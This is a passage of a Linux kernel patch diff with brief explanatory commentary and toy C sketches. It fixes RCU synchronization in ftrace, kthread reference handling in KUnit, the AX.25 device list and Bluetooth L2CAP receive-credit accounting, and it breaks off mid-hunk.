+@@ -138,6 +140,9 @@ static int __init housekeeping_setup(char *str, unsigned long flags)
+ 		}
+ 	}
+ 
++	if (cpumask_empty(non_housekeeping_mask))
++		goto free_housekeeping_staging;
++
+ 	if (!housekeeping.flags) {
+ 		/* First setup call ("nohz_full=" or "isolcpus=") */
+ 		enum hk_type type;
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54ea..d404b5d2d842e 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -1436,7 +1436,7 @@ static void set_domain_attribute(struct sched_domain *sd,
+ 	} else
+ 		request = attr->relax_domain_level;
+ 
+-	if (sd->level > request) {
++	if (sd->level >= request) {
+ 		/* Turn off idle balance on this domain: */
+ 		sd->flags &= ~(SD_BALANCE_WAKE|SD_BALANCE_NEWIDLE);
+ 	}
+diff --git a/kernel/softirq.c b/kernel/softirq.c
+index c8a6913c067d9..a47396161843a 100644
+--- a/kernel/softirq.c
++++ b/kernel/softirq.c
+@@ -525,7 +525,7 @@ static inline bool lockdep_softirq_start(void) { return false; }
+ static inline void lockdep_softirq_end(bool in_hardirq) { }
+ #endif
+ 
+-asmlinkage __visible void __softirq_entry __do_softirq(void)
++static void handle_softirqs(bool ksirqd)
+ {
+ 	unsigned long end = jiffies + MAX_SOFTIRQ_TIME;
+ 	unsigned long old_flags = current->flags;
+@@ -580,8 +580,7 @@ asmlinkage __visible void __softirq_entry __do_softirq(void)
+ 		pending >>= softirq_bit;
+ 	}
+ 
+-	if (!IS_ENABLED(CONFIG_PREEMPT_RT) &&
+-	    __this_cpu_read(ksoftirqd) == current)
++	if (!IS_ENABLED(CONFIG_PREEMPT_RT) && ksirqd)
+ 		rcu_softirq_qs();
+ 
+ 	local_irq_disable();
+@@ -601,6 +600,11 @@ asmlinkage __visible void __softirq_entry __do_softirq(void)
+ 	current_restore_flags(old_flags, PF_MEMALLOC);
+ }
+ 
++asmlinkage __visible void __softirq_entry __do_softirq(void)
++{
++	handle_softirqs(false);
++}
++
+ /**
+  * irq_enter_rcu - Enter an interrupt context with RCU watching
+  */
+@@ -931,7 +935,7 @@ static void run_ksoftirqd(unsigned int cpu)
+ 		 * We can safely run softirq on inline stack, as we are not deep
+ 		 * in the task stack here.
+ 		 */
+-		__do_softirq();
++		handle_softirqs(true);
+ 		ksoftirqd_run_end();
+ 		cond_resched();
+ 		return;
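
The softirq refactor passes the "running as ksoftirqd" fact down from the call site rather than re-deriving it from per-CPU state inside the loop; each entry point states its own context. A toy sketch of that shape (names illustrative):

#include <stdbool.h>
#include <stdio.h>

/* One worker, two entry points: the caller states its context
 * instead of the worker probing global state to rediscover it. */
static void handle_work(bool from_kthread)
{
	if (from_kthread)
		puts("report quiescent state (kthread path only)");
	puts("pending work handled");
}

static void irq_exit_path(void) { handle_work(false); }
static void kthread_path(void)  { handle_work(true); }

int main(void)
{
	irq_exit_path();
	kthread_path();
	return 0;
}
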
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 552956ccb91c8..e9ce45dce31b2 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1565,12 +1565,15 @@ static struct dyn_ftrace *lookup_rec(unsigned long start, unsigned long end)
+ unsigned long ftrace_location_range(unsigned long start, unsigned long end)
+ {
+ 	struct dyn_ftrace *rec;
++	unsigned long ip = 0;
+ 
++	rcu_read_lock();
+ 	rec = lookup_rec(start, end);
+ 	if (rec)
+-		return rec->ip;
++		ip = rec->ip;
++	rcu_read_unlock();
+ 
+-	return 0;
++	return ip;
+ }
+ 
+ /**
+@@ -1583,25 +1586,22 @@ unsigned long ftrace_location_range(unsigned long start, unsigned long end)
+  */
+ unsigned long ftrace_location(unsigned long ip)
+ {
+-	struct dyn_ftrace *rec;
++	unsigned long loc;
+ 	unsigned long offset;
+ 	unsigned long size;
+ 
+-	rec = lookup_rec(ip, ip);
+-	if (!rec) {
++	loc = ftrace_location_range(ip, ip);
++	if (!loc) {
+ 		if (!kallsyms_lookup_size_offset(ip, &size, &offset))
+ 			goto out;
+ 
+ 		/* map sym+0 to __fentry__ */
+ 		if (!offset)
+-			rec = lookup_rec(ip, ip + size - 1);
++			loc = ftrace_location_range(ip, ip + size - 1);
+ 	}
+ 
+-	if (rec)
+-		return rec->ip;
+-
+ out:
+-	return 0;
++	return loc;
+ }
+ 
+ /**
+@@ -6784,6 +6784,8 @@ static int ftrace_process_locs(struct module *mod,
+ 	/* We should have used all pages unless we skipped some */
+ 	if (pg_unuse) {
+ 		WARN_ON(!skipped);
++		/* Need to synchronize with ftrace_location_range() */
++		synchronize_rcu();
+ 		ftrace_free_pages(pg_unuse);
+ 	}
+ 	return ret;
+@@ -6998,6 +7000,9 @@ void ftrace_release_mod(struct module *mod)
+  out_unlock:
+ 	mutex_unlock(&ftrace_lock);
+ 
++	/* Need to synchronize with ftrace_location_range() */
++	if (tmp_page)
++		synchronize_rcu();
+ 	for (pg = tmp_page; pg; pg = tmp_page) {
+ 
+ 		/* Needs to be called outside of ftrace_lock */
+@@ -7332,6 +7337,7 @@ void ftrace_free_mem(struct module *mod, void *start_ptr, void *end_ptr)
+ 	unsigned long start = (unsigned long)(start_ptr);
+ 	unsigned long end = (unsigned long)(end_ptr);
+ 	struct ftrace_page **last_pg = &ftrace_pages_start;
++	struct ftrace_page *tmp_page = NULL;
+ 	struct ftrace_page *pg;
+ 	struct dyn_ftrace *rec;
+ 	struct dyn_ftrace key;
+@@ -7375,12 +7381,8 @@ void ftrace_free_mem(struct module *mod, void *start_ptr, void *end_ptr)
+ 		ftrace_update_tot_cnt--;
+ 		if (!pg->index) {
+ 			*last_pg = pg->next;
+-			if (pg->records) {
+-				free_pages((unsigned long)pg->records, pg->order);
+-				ftrace_number_of_pages -= 1 << pg->order;
+-			}
+-			ftrace_number_of_groups--;
+-			kfree(pg);
++			pg->next = tmp_page;
++			tmp_page = pg;
+ 			pg = container_of(last_pg, struct ftrace_page, next);
+ 			if (!(*last_pg))
+ 				ftrace_pages = pg;
+@@ -7397,6 +7399,11 @@ void ftrace_free_mem(struct module *mod, void *start_ptr, void *end_ptr)
+ 		clear_func_from_hashes(func);
+ 		kfree(func);
+ 	}
++	/* Need to synchronize with ftrace_location_range() */
++	if (tmp_page) {
++		synchronize_rcu();
++		ftrace_free_pages(tmp_page);
++	}
+ }
+ 
+ void __init ftrace_free_init_mem(void)
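
All of the ftrace hunks follow the standard RCU deletion pattern: ftrace_location_range() now walks the records under rcu_read_lock(), so a writer must unlink pages first, wait out pre-existing readers with synchronize_rcu(), and only then free the memory. A kernel-style sketch of the pattern on a simple RCU list (illustrative code, not the ftrace internals):

/* Illustrative kernel-style code; assumes <linux/rculist.h> and
 * <linux/slab.h>. */
struct rec {
	struct list_head list;
	unsigned long ip;
};

static LIST_HEAD(recs);		/* readers traverse under RCU */

/* Reader side: lockless, inside an RCU read-side critical section. */
static unsigned long lookup(unsigned long ip)
{
	struct rec *r;
	unsigned long ret = 0;

	rcu_read_lock();
	list_for_each_entry_rcu(r, &recs, list) {
		if (r->ip == ip) {
			ret = r->ip;
			break;
		}
	}
	rcu_read_unlock();
	return ret;
}

/* Writer side: unlink first, wait for readers, free last. */
static void remove_rec(struct rec *r)
{
	list_del_rcu(&r->list);
	synchronize_rcu();	/* every reader that could see 'r' is done */
	kfree(r);
}
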
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 337162e0c3d53..0093fc56ab3ac 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1602,6 +1602,11 @@ static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
+  *
+  * As a safety measure we check to make sure the data pages have not
+  * been corrupted.
++ *
++ * Callers of this function need to guarantee that the list of pages doesn't get
++ * modified during the check. In particular, if it's possible that the function
++ * is invoked with concurrent readers which can swap in a new reader page then
++ * the caller should take cpu_buffer->reader_lock.
+  */
+ static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
+ {
+@@ -2323,8 +2328,12 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 		 */
+ 		synchronize_rcu();
+ 		for_each_buffer_cpu(buffer, cpu) {
++			unsigned long flags;
++
+ 			cpu_buffer = buffer->buffers[cpu];
++			raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
+ 			rb_check_pages(cpu_buffer);
++			raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
+ 		}
+ 		atomic_dec(&buffer->record_disabled);
+ 	}
+diff --git a/kernel/trace/rv/rv.c b/kernel/trace/rv/rv.c
+index 6c97cc2d754aa..d0d49b910474f 100644
+--- a/kernel/trace/rv/rv.c
++++ b/kernel/trace/rv/rv.c
+@@ -245,6 +245,7 @@ static int __rv_disable_monitor(struct rv_monitor_def *mdef, bool sync)
+ 
+ /**
+  * rv_disable_monitor - disable a given runtime monitor
++ * @mdef: Pointer to the monitor definition structure.
+  *
+  * Returns 0 on success.
+  */
+@@ -256,6 +257,7 @@ int rv_disable_monitor(struct rv_monitor_def *mdef)
+ 
+ /**
+  * rv_enable_monitor - enable a given runtime monitor
++ * @mdef: Pointer to the monitor definition structure.
+  *
+  * Returns 0 on success, error otherwise.
+  */
+diff --git a/lib/kunit/try-catch.c b/lib/kunit/try-catch.c
+index f7825991d576a..d9d1df28cc52e 100644
+--- a/lib/kunit/try-catch.c
++++ b/lib/kunit/try-catch.c
+@@ -11,6 +11,7 @@
+ #include <linux/completion.h>
+ #include <linux/kernel.h>
+ #include <linux/kthread.h>
++#include <linux/sched/task.h>
+ 
+ #include "try-catch-impl.h"
+ 
+@@ -65,13 +66,14 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 	try_catch->context = context;
+ 	try_catch->try_completion = &try_completion;
+ 	try_catch->try_result = 0;
+-	task_struct = kthread_run(kunit_generic_run_threadfn_adapter,
+-				  try_catch,
+-				  "kunit_try_catch_thread");
++	task_struct = kthread_create(kunit_generic_run_threadfn_adapter,
++				     try_catch, "kunit_try_catch_thread");
+ 	if (IS_ERR(task_struct)) {
+ 		try_catch->catch(try_catch->context);
+ 		return;
+ 	}
++	get_task_struct(task_struct);
++	wake_up_process(task_struct);
+ 
+ 	time_remaining = wait_for_completion_timeout(&try_completion,
+ 						     kunit_test_timeout());
+@@ -81,6 +83,7 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 		kthread_stop(task_struct);
+ 	}
+ 
++	put_task_struct(task_struct);
+ 	exit_code = try_catch->try_result;
+ 
+ 	if (!exit_code)
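
The KUnit fix splits kthread_run() into kthread_create() plus wake_up_process() with a get_task_struct() in between: without its own reference, the harness could race with the thread exiting on its own, and the later kthread_stop() would touch a freed task_struct. A kernel-style sketch of the safe start/stop shape (assumes <linux/kthread.h> and <linux/completion.h>; run_bounded() and its arguments are invented):

static int run_bounded(int (*threadfn)(void *), void *data,
		       struct completion *done)
{
	struct task_struct *t;

	t = kthread_create(threadfn, data, "worker");
	if (IS_ERR(t))
		return PTR_ERR(t);

	get_task_struct(t);	/* pin task_struct across our kthread_stop() */
	wake_up_process(t);	/* only now may the thread run (and exit) */

	if (!wait_for_completion_timeout(done, HZ))
		kthread_stop(t);	/* safe: our reference keeps t alive */

	put_task_struct(t);	/* drop the pin */
	return 0;
}
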
+diff --git a/lib/slub_kunit.c b/lib/slub_kunit.c
+index 7a0564d7cb7ae..9384747d90e5f 100644
+--- a/lib/slub_kunit.c
++++ b/lib/slub_kunit.c
+@@ -39,7 +39,7 @@ static void test_next_pointer(struct kunit *test)
+ 
+ 	ptr_addr = (unsigned long *)(p + s->offset);
+ 	tmp = *ptr_addr;
+-	p[s->offset] = 0x12;
++	p[s->offset] = ~p[s->offset];
+ 
+ 	/*
+ 	 * Expecting three errors.
+diff --git a/lib/test_hmm.c b/lib/test_hmm.c
+index 67e6f83fe0f82..be50a1fdba70b 100644
+--- a/lib/test_hmm.c
++++ b/lib/test_hmm.c
+@@ -1232,8 +1232,8 @@ static void dmirror_device_evict_chunk(struct dmirror_chunk *chunk)
+ 	unsigned long *src_pfns;
+ 	unsigned long *dst_pfns;
+ 
+-	src_pfns = kcalloc(npages, sizeof(*src_pfns), GFP_KERNEL);
+-	dst_pfns = kcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL);
++	src_pfns = kvcalloc(npages, sizeof(*src_pfns), GFP_KERNEL | __GFP_NOFAIL);
++	dst_pfns = kvcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	migrate_device_range(src_pfns, start_pfn, npages);
+ 	for (i = 0; i < npages; i++) {
+@@ -1256,8 +1256,8 @@ static void dmirror_device_evict_chunk(struct dmirror_chunk *chunk)
+ 	}
+ 	migrate_device_pages(src_pfns, dst_pfns, npages);
+ 	migrate_device_finalize(src_pfns, dst_pfns, npages);
+-	kfree(src_pfns);
+-	kfree(dst_pfns);
++	kvfree(src_pfns);
++	kvfree(dst_pfns);
+ }
+ 
+ /* Removes free pages from the free list so they can't be re-allocated */
+diff --git a/net/ax25/ax25_dev.c b/net/ax25/ax25_dev.c
+index c5462486dbca1..fcc64645bbf5e 100644
+--- a/net/ax25/ax25_dev.c
++++ b/net/ax25/ax25_dev.c
+@@ -22,11 +22,12 @@
+ #include <net/sock.h>
+ #include <linux/uaccess.h>
+ #include <linux/fcntl.h>
++#include <linux/list.h>
+ #include <linux/mm.h>
+ #include <linux/interrupt.h>
+ #include <linux/init.h>
+ 
+-ax25_dev *ax25_dev_list;
++static LIST_HEAD(ax25_dev_list);
+ DEFINE_SPINLOCK(ax25_dev_lock);
+ 
+ ax25_dev *ax25_addr_ax25dev(ax25_address *addr)
+@@ -34,10 +35,11 @@ ax25_dev *ax25_addr_ax25dev(ax25_address *addr)
+ 	ax25_dev *ax25_dev, *res = NULL;
+ 
+ 	spin_lock_bh(&ax25_dev_lock);
+-	for (ax25_dev = ax25_dev_list; ax25_dev != NULL; ax25_dev = ax25_dev->next)
++	list_for_each_entry(ax25_dev, &ax25_dev_list, list)
+ 		if (ax25cmp(addr, (const ax25_address *)ax25_dev->dev->dev_addr) == 0) {
+ 			res = ax25_dev;
+ 			ax25_dev_hold(ax25_dev);
++			break;
+ 		}
+ 	spin_unlock_bh(&ax25_dev_lock);
+ 
+@@ -59,7 +61,6 @@ void ax25_dev_device_up(struct net_device *dev)
+ 	}
+ 
+ 	refcount_set(&ax25_dev->refcount, 1);
+-	dev->ax25_ptr     = ax25_dev;
+ 	ax25_dev->dev     = dev;
+ 	netdev_hold(dev, &ax25_dev->dev_tracker, GFP_KERNEL);
+ 	ax25_dev->forward = NULL;
+@@ -85,10 +86,9 @@ void ax25_dev_device_up(struct net_device *dev)
+ #endif
+ 
+ 	spin_lock_bh(&ax25_dev_lock);
+-	ax25_dev->next = ax25_dev_list;
+-	ax25_dev_list  = ax25_dev;
++	list_add(&ax25_dev->list, &ax25_dev_list);
++	dev->ax25_ptr     = ax25_dev;
+ 	spin_unlock_bh(&ax25_dev_lock);
+-	ax25_dev_hold(ax25_dev);
+ 
+ 	ax25_register_dev_sysctl(ax25_dev);
+ }
+@@ -111,32 +111,19 @@ void ax25_dev_device_down(struct net_device *dev)
+ 	/*
+ 	 *	Remove any packet forwarding that points to this device.
+ 	 */
+-	for (s = ax25_dev_list; s != NULL; s = s->next)
++	list_for_each_entry(s, &ax25_dev_list, list)
+ 		if (s->forward == dev)
+ 			s->forward = NULL;
+ 
+-	if ((s = ax25_dev_list) == ax25_dev) {
+-		ax25_dev_list = s->next;
+-		goto unlock_put;
+-	}
+-
+-	while (s != NULL && s->next != NULL) {
+-		if (s->next == ax25_dev) {
+-			s->next = ax25_dev->next;
+-			goto unlock_put;
++	list_for_each_entry(s, &ax25_dev_list, list) {
++		if (s == ax25_dev) {
++			list_del(&s->list);
++			break;
+ 		}
+-
+-		s = s->next;
+ 	}
+-	spin_unlock_bh(&ax25_dev_lock);
+-	dev->ax25_ptr = NULL;
+-	ax25_dev_put(ax25_dev);
+-	return;
+ 
+-unlock_put:
+-	spin_unlock_bh(&ax25_dev_lock);
+-	ax25_dev_put(ax25_dev);
+ 	dev->ax25_ptr = NULL;
++	spin_unlock_bh(&ax25_dev_lock);
+ 	netdev_put(dev, &ax25_dev->dev_tracker);
+ 	ax25_dev_put(ax25_dev);
+ }
+@@ -200,16 +187,13 @@ struct net_device *ax25_fwd_dev(struct net_device *dev)
+  */
+ void __exit ax25_dev_free(void)
+ {
+-	ax25_dev *s, *ax25_dev;
++	ax25_dev *s, *n;
+ 
+ 	spin_lock_bh(&ax25_dev_lock);
+-	ax25_dev = ax25_dev_list;
+-	while (ax25_dev != NULL) {
+-		s        = ax25_dev;
+-		netdev_put(ax25_dev->dev, &ax25_dev->dev_tracker);
+-		ax25_dev = ax25_dev->next;
++	list_for_each_entry_safe(s, n, &ax25_dev_list, list) {
++		netdev_put(s->dev, &s->dev_tracker);
++		list_del(&s->list);
+ 		kfree(s);
+ 	}
+-	ax25_dev_list = NULL;
+ 	spin_unlock_bh(&ax25_dev_lock);
+ }
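
The AX.25 conversion replaces a hand-rolled singly linked list, with its special-cased head removal, by <linux/list.h>, whose doubly linked nodes make unlinking O(1) and uniform. A minimal userspace re-creation of the idiom shows why list_del() needs no head walk (the node layout and container_of() mirror the kernel's):

#include <stdio.h>
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

#define container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))

static void list_add(struct list_head *n, struct list_head *h)
{
	n->next = h->next; n->prev = h;
	h->next->prev = n; h->next = n;
}

static void list_del(struct list_head *n)	/* O(1), no head needed */
{
	n->prev->next = n->next;
	n->next->prev = n->prev;
}

struct dev { int id; struct list_head list; };

int main(void)
{
	struct list_head head = { &head, &head };
	struct dev a = { 1 }, b = { 2 };

	list_add(&a.list, &head);
	list_add(&b.list, &head);
	list_del(&a.list);		/* works without knowing 'head' */

	for (struct list_head *p = head.next; p != &head; p = p->next)
		printf("dev %d\n", container_of(p, struct dev, list)->id);
	return 0;
}
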
+diff --git a/net/bluetooth/af_bluetooth.c b/net/bluetooth/af_bluetooth.c
+index 3f9ff02baafe3..b8b31b79904a8 100644
+--- a/net/bluetooth/af_bluetooth.c
++++ b/net/bluetooth/af_bluetooth.c
+@@ -140,6 +140,27 @@ static int bt_sock_create(struct net *net, struct socket *sock, int proto,
+ 	return err;
+ }
+ 
++struct sock *bt_sock_alloc(struct net *net, struct socket *sock,
++			   struct proto *prot, int proto, gfp_t prio, int kern)
++{
++	struct sock *sk;
++
++	sk = sk_alloc(net, PF_BLUETOOTH, prio, prot, kern);
++	if (!sk)
++		return NULL;
++
++	sock_init_data(sock, sk);
++	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
++
++	sock_reset_flag(sk, SOCK_ZAPPED);
++
++	sk->sk_protocol = proto;
++	sk->sk_state    = BT_OPEN;
++
++	return sk;
++}
++EXPORT_SYMBOL(bt_sock_alloc);
++
+ void bt_sock_link(struct bt_sock_list *l, struct sock *sk)
+ {
+ 	write_lock(&l->lock);
+diff --git a/net/bluetooth/bnep/sock.c b/net/bluetooth/bnep/sock.c
+index 57d509d77cb46..00d47bcf4d7dc 100644
+--- a/net/bluetooth/bnep/sock.c
++++ b/net/bluetooth/bnep/sock.c
+@@ -205,21 +205,13 @@ static int bnep_sock_create(struct net *net, struct socket *sock, int protocol,
+ 	if (sock->type != SOCK_RAW)
+ 		return -ESOCKTNOSUPPORT;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, GFP_ATOMIC, &bnep_proto, kern);
++	sk = bt_sock_alloc(net, sock, &bnep_proto, protocol, GFP_ATOMIC, kern);
+ 	if (!sk)
+ 		return -ENOMEM;
+ 
+-	sock_init_data(sock, sk);
+-
+ 	sock->ops = &bnep_sock_ops;
+-
+ 	sock->state = SS_UNCONNECTED;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = protocol;
+-	sk->sk_state	= BT_OPEN;
+-
+ 	bt_sock_link(&bnep_sk_list, sk);
+ 	return 0;
+ }
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 484fc2a8e4baa..730e569cae36d 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -2144,18 +2144,12 @@ static int hci_sock_create(struct net *net, struct socket *sock, int protocol,
+ 
+ 	sock->ops = &hci_sock_ops;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, GFP_ATOMIC, &hci_sk_proto, kern);
++	sk = bt_sock_alloc(net, sock, &hci_sk_proto, protocol, GFP_ATOMIC,
++			   kern);
+ 	if (!sk)
+ 		return -ENOMEM;
+ 
+-	sock_init_data(sock, sk);
+-
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = protocol;
+-
+ 	sock->state = SS_UNCONNECTED;
+-	sk->sk_state = BT_OPEN;
+ 	sk->sk_destruct = hci_sock_destruct;
+ 
+ 	bt_sock_link(&hci_sk_list, sk);
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 91e990accbf20..5fe1008799ab4 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -695,21 +695,13 @@ static struct sock *iso_sock_alloc(struct net *net, struct socket *sock,
+ {
+ 	struct sock *sk;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &iso_proto, kern);
++	sk = bt_sock_alloc(net, sock, &iso_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	sk->sk_destruct = iso_sock_destruct;
+ 	sk->sk_sndtimeo = ISO_CONN_TIMEOUT;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state    = BT_OPEN;
+-
+ 	/* Set address type as public as default src address is BDADDR_ANY */
+ 	iso_pi(sk)->src_type = BDADDR_LE_PUBLIC;
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index c34011113d4c5..5f9a599baa34d 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -477,6 +477,9 @@ struct l2cap_chan *l2cap_chan_create(void)
+ 	/* Set default lock nesting level */
+ 	atomic_set(&chan->nesting, L2CAP_NESTING_NORMAL);
+ 
++	/* Available receive buffer space is initially unknown */
++	chan->rx_avail = -1;
++
+ 	write_lock(&chan_list_lock);
+ 	list_add(&chan->global_l, &chan_list);
+ 	write_unlock(&chan_list_lock);
+@@ -558,6 +561,28 @@ void l2cap_chan_set_defaults(struct l2cap_chan *chan)
+ }
+ EXPORT_SYMBOL_GPL(l2cap_chan_set_defaults);
+ 
++static __u16 l2cap_le_rx_credits(struct l2cap_chan *chan)
++{
++	size_t sdu_len = chan->sdu ? chan->sdu->len : 0;
++
++	if (chan->mps == 0)
++		return 0;
++
++	/* If we don't know the available space in the receiver buffer, give
++	 * enough credits for a full packet.
++	 */
++	if (chan->rx_avail == -1)
++		return (chan->imtu / chan->mps) + 1;
++
++	/* If we know how much space is available in the receive buffer, give
++	 * out as many credits as would fill the buffer.
++	 */
++	if (chan->rx_avail <= sdu_len)
++		return 0;
++
++	return DIV_ROUND_UP(chan->rx_avail - sdu_len, chan->mps);
++}
++
+ static void l2cap_le_flowctl_init(struct l2cap_chan *chan, u16 tx_credits)
+ {
+ 	chan->sdu = NULL;
+@@ -566,8 +591,7 @@ static void l2cap_le_flowctl_init(struct l2cap_chan *chan, u16 tx_credits)
+ 	chan->tx_credits = tx_credits;
+ 	/* Derive MPS from connection MTU to stop HCI fragmentation */
+ 	chan->mps = min_t(u16, chan->imtu, chan->conn->mtu - L2CAP_HDR_SIZE);
+-	/* Give enough credits for a full packet */
+-	chan->rx_credits = (chan->imtu / chan->mps) + 1;
++	chan->rx_credits = l2cap_le_rx_credits(chan);
+ 
+ 	skb_queue_head_init(&chan->tx_q);
+ }
+@@ -579,7 +603,7 @@ static void l2cap_ecred_init(struct l2cap_chan *chan, u16 tx_credits)
+ 	/* L2CAP implementations shall support a minimum MPS of 64 octets */
+ 	if (chan->mps < L2CAP_ECRED_MIN_MPS) {
+ 		chan->mps = L2CAP_ECRED_MIN_MPS;
+-		chan->rx_credits = (chan->imtu / chan->mps) + 1;
++		chan->rx_credits = l2cap_le_rx_credits(chan);
+ 	}
+ }
+ 
+@@ -7529,9 +7553,7 @@ static void l2cap_chan_le_send_credits(struct l2cap_chan *chan)
+ {
+ 	struct l2cap_conn *conn = chan->conn;
+ 	struct l2cap_le_credits pkt;
+-	u16 return_credits;
+-
+-	return_credits = (chan->imtu / chan->mps) + 1;
++	u16 return_credits = l2cap_le_rx_credits(chan);
+ 
+ 	if (chan->rx_credits >= return_credits)
+ 		return;
+@@ -7550,6 +7572,19 @@ static void l2cap_chan_le_send_credits(struct l2cap_chan *chan)
+ 	l2cap_send_cmd(conn, chan->ident, L2CAP_LE_CREDITS, sizeof(pkt), &pkt);
+ }
+ 
++void l2cap_chan_rx_avail(struct l2cap_chan *chan, ssize_t rx_avail)
++{
++	if (chan->rx_avail == rx_avail)
++		return;
++
++	BT_DBG("chan %p has %zd bytes avail for rx", chan, rx_avail);
++
++	chan->rx_avail = rx_avail;
++
++	if (chan->state == BT_CONNECTED)
++		l2cap_chan_le_send_credits(chan);
++}
++
+ static int l2cap_ecred_recv(struct l2cap_chan *chan, struct sk_buff *skb)
+ {
+ 	int err;
+@@ -7559,6 +7594,12 @@ static int l2cap_ecred_recv(struct l2cap_chan *chan, struct sk_buff *skb)
+ 	/* Wait recv to confirm reception before updating the credits */
+ 	err = chan->ops->recv(chan, skb);
+ 
++	if (err < 0 && chan->rx_avail != -1) {
++		BT_ERR("Queueing received LE L2CAP data failed");
++		l2cap_send_disconn_req(chan, ECONNRESET);
++		return err;
++	}
++
+ 	/* Update credits whenever an SDU is received */
+ 	l2cap_chan_le_send_credits(chan);
+ 
+@@ -7581,7 +7622,8 @@ static int l2cap_ecred_data_rcv(struct l2cap_chan *chan, struct sk_buff *skb)
+ 	}
+ 
+ 	chan->rx_credits--;
+-	BT_DBG("rx_credits %u -> %u", chan->rx_credits + 1, chan->rx_credits);
++	BT_DBG("chan %p: rx_credits %u -> %u",
++	       chan, chan->rx_credits + 1, chan->rx_credits);
+ 
+ 	/* Update if remote had run out of credits, this should only happen
+ 	 * if the remote is not using the entire MPS.
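
The credit computation is plain arithmetic: credits should cover only the space actually free in the receive buffer, minus any partially reassembled SDU, rounded up to whole MPS-sized PDUs, with -1 meaning "unknown" and falling back to the old one-full-packet formula. A stand-alone mirror of l2cap_le_rx_credits() with sample values:

#include <stdio.h>

#define DIV_ROUND_UP(n, d)	(((n) + (d) - 1) / (d))

/* Mirror of the patched logic; all sizes in bytes. */
static unsigned int le_rx_credits(long rx_avail, unsigned int mps,
				  unsigned int imtu, long sdu_len)
{
	if (mps == 0)
		return 0;
	if (rx_avail == -1)		/* buffer space unknown */
		return imtu / mps + 1;	/* legacy: one full packet */
	if (rx_avail <= sdu_len)	/* no room beyond the current SDU */
		return 0;
	return DIV_ROUND_UP(rx_avail - sdu_len, mps);
}

int main(void)
{
	printf("%u\n", le_rx_credits(-1, 64, 672, 0));	  /* 11, legacy formula */
	printf("%u\n", le_rx_credits(500, 64, 672, 0));	  /* 8 PDUs fit */
	printf("%u\n", le_rx_credits(100, 64, 672, 120)); /* 0, SDU already over */
	return 0;
}
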
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index e3c7029ec8a61..af6d4e3b8c065 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1165,6 +1165,34 @@ static int l2cap_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	return err;
+ }
+ 
++static void l2cap_publish_rx_avail(struct l2cap_chan *chan)
++{
++	struct sock *sk = chan->data;
++	ssize_t avail = sk->sk_rcvbuf - atomic_read(&sk->sk_rmem_alloc);
++	int expected_skbs, skb_overhead;
++
++	if (avail <= 0) {
++		l2cap_chan_rx_avail(chan, 0);
++		return;
++	}
++
++	if (!chan->mps) {
++		l2cap_chan_rx_avail(chan, -1);
++		return;
++	}
++
++	/* Correct available memory by estimated sk_buff overhead.
++	 * This is significant due to small transfer sizes. However, accept
++	 * at least one full packet if receive space is non-zero.
++	 */
++	expected_skbs = DIV_ROUND_UP(avail, chan->mps);
++	skb_overhead = expected_skbs * sizeof(struct sk_buff);
++	if (skb_overhead < avail)
++		l2cap_chan_rx_avail(chan, avail - skb_overhead);
++	else
++		l2cap_chan_rx_avail(chan, -1);
++}
++
+ static int l2cap_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ 			      size_t len, int flags)
+ {
+@@ -1201,28 +1229,33 @@ static int l2cap_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ 	else
+ 		err = bt_sock_recvmsg(sock, msg, len, flags);
+ 
+-	if (pi->chan->mode != L2CAP_MODE_ERTM)
++	if (pi->chan->mode != L2CAP_MODE_ERTM &&
++	    pi->chan->mode != L2CAP_MODE_LE_FLOWCTL &&
++	    pi->chan->mode != L2CAP_MODE_EXT_FLOWCTL)
+ 		return err;
+ 
+-	/* Attempt to put pending rx data in the socket buffer */
+-
+ 	lock_sock(sk);
+ 
+-	if (!test_bit(CONN_LOCAL_BUSY, &pi->chan->conn_state))
+-		goto done;
++	l2cap_publish_rx_avail(pi->chan);
+ 
+-	if (pi->rx_busy_skb) {
